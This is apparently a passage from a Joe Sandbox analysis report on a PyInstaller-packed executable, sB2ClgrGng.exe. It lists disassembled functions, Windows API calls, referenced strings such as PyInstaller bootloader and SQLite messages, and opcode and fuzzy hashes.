API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction ID: 91ef1a346178f1b4215449e647d744ae0f94e7b1c4b2e4dc143589f49324fc34
Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction Fuzzy Hash: 6D514922E086458EFB10FFB1D4923BE27A1BB88B98F148935DE0D9B689DF38D4519740

Function 00007FF6448720C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6448720F4
SetWindowLongPtrW.USER32 ref: 00007FF644872116
GetWindowLongPtrW.USER32 ref: 00007FF644872140
InvalidateRect.USER32 ref: 00007FF644872160

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: a73301727956a14f1d39932d440ae04c9602998f35d50b685e71cc81e6548ac6
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 7C110C21F0C54286F654B7A9E9D62799292FFC57C0F444030DF4947B9ECD3DE4D59210

Function 00007FF644895B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF644891760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644891793

_get_daylight.LIBCMT ref: 00007FF644895C34
_get_daylight.LIBCMT ref: 00007FF644895C45

Strings

?, xrefs: 00007FF644895BC5

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction ID: 09c06f490ac8816fbc27c8c6d1364462711493603c501fad9900685126725f33
Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction Fuzzy Hash: A841F913A0CA82DAF764B725D5933796B90EF80BA4F144235EE5C86ADDDF3ED4418700

Function 00007FF644889014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644889046

Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF64487CBA5), ref: 00007FF644889064

Strings

C:\Users\user\Desktop\sB2ClgrGng.exe, xrefs: 00007FF644889052

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\sB2ClgrGng.exe
API String ID: 3580290477-2965912956
Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction ID: 32b3f3127922d3cd5c9320172619681a085a3b7bba5847fb0bf508917d675777
Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction Fuzzy Hash: 23413936A0CA528EEB15BF2598C20B967A5EF45BD4B564035ED4E87B89DF3CE481C300

Function 00007FF64488CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF64488CD4F
GetLastError.KERNEL32 ref: 00007FF64488CD71

Strings

U, xrefs: 00007FF64488CCFB

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: d46a9655ffac21e5b482143abb3de813be5387ae12781428e541197a31f20343
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: FC418F22A1CA8189EB60BF25E4853AA67A1FBA8794F444135EE4DC7B9CEF3CD445C740

Function 00007FF64488F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF64488F5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF64488F64A

Strings

:, xrefs: 00007FF64488F60E

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction ID: 325a810fdf6a7a7077d78a166e7dfaffa565f521c16f16e5947c9281b6c7cdb3
Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction Fuzzy Hash: 6321D262A1C68189EB20FB11D48627D73A1FB88B44F464235DF8D83699DF7DE944CB41

Function 00007FF64487FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF64487FD98
RaiseException.KERNEL32 ref: 00007FF64487FDD9

Strings

csm, xrefs: 00007FF64487FDC6

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 187bd0a083416dd84e950d13af2fdb7fcfc2929a143ad516ae7646986dbf66de
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: 03112E3261CB8186EB61AF16E8902597BE4FB88B88F588230DF8D47759DF3DD551C700

Function 00007FF64489073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64489076C
GetDriveTypeW.KERNEL32 ref: 00007FF6448907AC

Strings

:, xrefs: 00007FF644890795

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: 3b94e68c8aa6fbeaffad1e9f2bcddb0b45d18847c0216af44ff3b419a800d7e8
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: 97014F62A1CA02DEF720BF6094A727E63A0FF89754F840435DD4DC669AEF2EE5049B14

Analysis Process: sB2ClgrGng.exePID: 2892, Parent PID: 5816COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.1%
Total number of Nodes:	897
Total number of Limit Nodes:	44

Executed Functions

Function 00007FF644871000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pyi-contents-directory, xrefs: 00007FF644873B8D
_PYI_ARCHIVE_FILE, xrefs: 00007FF6448738D2, 00007FF6448739FF
VCRUNTIME140.dll, xrefs: 00007FF644873DA9
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF644873D12
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF644873A17, 00007FF644873A2F, 00007FF644873A9B
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF644873C61
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF644873A0B, 00007FF644873CD4, 00007FF644873F63
pyi-python-flag, xrefs: 00007FF644873AD6
_PYI_SPLASH_IPC, xrefs: 00007FF644873A23, 00007FF644873EED
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6448739DE
MEI, xrefs: 00007FF644873933
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF644873E02
Failed to load splash screen resources!, xrefs: 00007FF644873E7D
bye-runtime-tmpdir, xrefs: 00007FF644873B68
Failed to start splash screen!, xrefs: 00007FF644873ECC
pkg, xrefs: 00007FF6448739BE
Failed to remove temporary directory: %s, xrefs: 00007FF644873FC7
Py_GIL_DISABLED, xrefs: 00007FF644873AF4
Failed to convert DLL search path!, xrefs: 00007FF644873DD4
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF644873EB3
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF644873971
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF644873BE8
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF644873B32
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF644873882, 00007FF6448738AF
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF644873D35
pyi-disable-windowed-traceback, xrefs: 00007FF644873BB2
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF644873E9E
Could not create temporary directory!, xrefs: 00007FF644873CBF

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 4651f0dbc160d0404dcf25292df1705b0130bb44d3f559e05366d82f1582b67c
Instruction ID: 0b21d57aca241b12cceed5b878a980193b2330edbd7d19641619f60746a22517
Opcode Fuzzy Hash: 4651f0dbc160d0404dcf25292df1705b0130bb44d3f559e05366d82f1582b67c
Instruction Fuzzy Hash: BE328D22F0CA8299FA15FB2098E73B96651AF95780F844032DE5DC36DEEF2DE554C302

Function 00007FFDFAEE9260 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEE932F
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEE940E
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEE9430
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEE95EE
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEE9617

Strings

-journal, xrefs: 00007FFDFAEE95F6
nolock, xrefs: 00007FFDFAEE9775
immutable, xrefs: 00007FFDFAEE97AD

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: -journal$immutable$nolock
API String ID: 1405196051-4201244970
Opcode ID: 4bea203775868ea68d251f7b6ff5e7b65c0255cc7c9f1107d0df10a960319b88
Instruction ID: 3d356916501f2b8accd3bec8a5a108379b278677c4f1e55851316293afb9a43e
Opcode Fuzzy Hash: 4bea203775868ea68d251f7b6ff5e7b65c0255cc7c9f1107d0df10a960319b88
Instruction Fuzzy Hash: 8432AD26B0978286EB28AF2594A4B7877A0FF45B94F094274CE7E477D8DF3DE8548300

Function 00007FF644896964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF644896698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448966D9
Part of subcall function 00007FF644896698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644896757
Part of subcall function 00007FF644896698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448967A8

CreateFileW.KERNEL32 ref: 00007FF644896A6A
CreateFileW.KERNEL32 ref: 00007FF644896ABA
GetLastError.KERNEL32 ref: 00007FF644896AEA
GetFileType.KERNEL32 ref: 00007FF644896AFF
GetLastError.KERNEL32 ref: 00007FF644896B09
CloseHandle.KERNEL32 ref: 00007FF644896B3C
CloseHandle.KERNEL32 ref: 00007FF644896C9F
CreateFileW.KERNEL32 ref: 00007FF644896CD4
GetLastError.KERNEL32 ref: 00007FF644896CE3

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: dd2a26a26d53b17f2a3778c7fc028f4f761f290a0883d563173c3e4702731931
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: 86C1B137B28E4689EB10EF65C4926AC3761F789BA8F015239DE1EA7798DF39D451C300

Function 00007FFDFB705B80 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 900librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDFB7066A9
GetProcAddress.KERNEL32 ref: 00007FFDFB7066D3
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDFB70675D
VirtualProtect.KERNEL32 ref: 00007FFDFB70677B

Strings

g2k, xrefs: 00007FFDFB705BBB

Memory Dump Source

Source File: 00000001.00000002.2198385176.00007FFDFB705000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FFDFB050000, based on PE: true

Associated: 00000001.00000002.2197166617.00007FFDFB050000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB051000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB2F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB301000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB377000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB543000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB546000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB641000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB64B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB6C3000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2197225283.00007FFDFB6F8000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2198442898.00007FFDFB707000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb050000_sB2ClgrGng.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: g2k
API String ID: 3300690313-2244601878
Opcode ID: a115f6f30bbd8d02d58b82d4edccd5ff49c332ccac270e82277def0562ac2ca0
Instruction ID: f85b281f9f6a6f4723201e2cdb804ed6f6054104a8373fbaf58998d52eb348d1
Opcode Fuzzy Hash: a115f6f30bbd8d02d58b82d4edccd5ff49c332ccac270e82277def0562ac2ca0
Instruction Fuzzy Hash: BE62282271929286E7158F38D96467E76A0F7547C5F085132EAEEC37E8EB3CEA45C700

Function 00007FFDFAF54D90 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF5501D
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF550CE

Strings

statement too long, xrefs: 00007FFDFAF54FD3
database schema is locked: %s, xrefs: 00007FFDFAF54F76
out of memory, xrefs: 00007FFDFAF54E7F

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 1405196051-1046679716
Opcode ID: e0e994430da0052bd68193ff13c487c778a35e96c4645b916390733936460a4e
Instruction ID: 145f269ee7470ab63e19b17cc3878949ca190a47e985dfbfa3328536a098d590
Opcode Fuzzy Hash: e0e994430da0052bd68193ff13c487c778a35e96c4645b916390733936460a4e
Instruction Fuzzy Hash: EBF1A726B0C6828AEB289F25D424BBA6B95FF85754F084275EA5E0B7D9CF7CE441C700

Function 00007FFDFAE9F160 Relevance: 6.8, APIs: 4, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDFAE9FC20
GetProcAddress.KERNEL32 ref: 00007FFDFAE9FC4A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDFAE9FCD4
VirtualProtect.KERNEL32 ref: 00007FFDFAE9FCF2

Memory Dump Source

Source File: 00000001.00000002.2196597395.00007FFDFAE9F000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFA9A0000, based on PE: true

Associated: 00000001.00000002.2195444266.00007FFDFA9A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFA9A1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFA9B2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFA9C2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFA9C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAA12000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAA27000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAA37000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAA3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAA4C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAD10000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAD12000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAD49000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAD86000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFADE1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAE51000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAE86000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2195488929.00007FFDFAE99000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2196648212.00007FFDFAEA0000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfa9a0000_sB2ClgrGng.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 9303a6f8cfca9bd28e22bda977947a27f0d72090a782595ff5d89924e4e259ae
Instruction ID: d4f9912b68b738525de7f0d6c26e2325133358e944bae9f42a96627a0735db57
Opcode Fuzzy Hash: 9303a6f8cfca9bd28e22bda977947a27f0d72090a782595ff5d89924e4e259ae
Instruction Fuzzy Hash: 7762496272829286E7199F38D4106BD77A0F748789F049532EAAFC37C8E67DEA45C710

Function 00007FFDFAEF2210 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 581COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEF23CF

Strings

:memory:, xrefs: 00007FFDFAEF226E

Memory Dump Source

